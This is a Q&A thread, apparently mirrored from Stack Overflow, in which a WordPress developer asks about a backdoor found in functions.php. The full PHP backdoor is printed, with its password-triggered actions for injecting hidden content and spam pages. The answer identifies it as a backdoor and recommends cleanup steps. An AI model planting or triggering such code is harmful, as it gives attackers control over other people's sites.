dqd72925 2017-03-28 17:45
浏览 47
已采纳

我的WordPress函数文件中的奇怪脚本

Can anyone explain this script? I found this script when I get back to functions.php file to input some new codes. Some kind of strange scripts that I don't remember I input it. And I found out that there was also a copy in the server where I upload the development site preview. It looks like too late for me to noticed this. I have 2 projects having this type of code inside my function. Was this a hacking procedure slip through my WordPress system?

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '730fcc096903854c1aa4f815a7d02b2b'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "
";
                        }
                break;

                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }

If this is possible malicious scripting, anyone do have suggestions to clear or avoid this in the future?

  • 写回答

1条回答 默认 最新

  • dongshao1873 2017-03-28 18:15
    关注

    It doesn't look like it should be there, but then again after reviewing the code it doesn't look like it does anything super malicious... Basically if someone enters your url with the parameters ?action=[ACTION]&password=730fcc096903854c1aa4f815a7d02b2b they will have access to your site to perform one of the actions listed in the switch() statement.

    It appears to render a full page at the end (including sidebars), then with some modified content from a foreign database table called [YOUR_PREFIX]_datalist -- which is not a native WordPress database table.

    Very strange if it was indeed part of the original theme development, but to me it looks like some sort of weak backdoor.

    Remove the file and go through all of the theme files and make sure you don't see anything else that shouldn't be there. Probably a good idea to run some sort of check on your plugins as well. Make sure they are all up to date and there are no known reported vulnerabilities. Then download a fresh copy of WordPress and replace all of the files except the wp-content directory. Make sure to change your settings in the wp-config.php file.

    After doing this, I would read up on some WP security tips. This article has tons of information on this: https://premium.wpmudev.org/blog/ultimate-wordpress-security-checklist/

    I recommend installing a WP Security Plugin as well. I personally prefer All in One WP Security & Firewall, but WordFence is great as well.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥30 这是哪个作者做的宝宝起名网站
  • ¥60 版本过低apk如何修改可以兼容新的安卓系统
  • ¥25 由IPR导致的DRIVER_POWER_STATE_FAILURE蓝屏
  • ¥50 有数据,怎么建立模型求影响全要素生产率的因素
  • ¥50 有数据,怎么用matlab求全要素生产率
  • ¥15 TI的insta-spin例程
  • ¥15 完成下列问题完成下列问题
  • ¥15 C#算法问题, 不知道怎么处理这个数据的转换
  • ¥15 YoloV5 第三方库的版本对照问题
  • ¥15 请完成下列相关问题!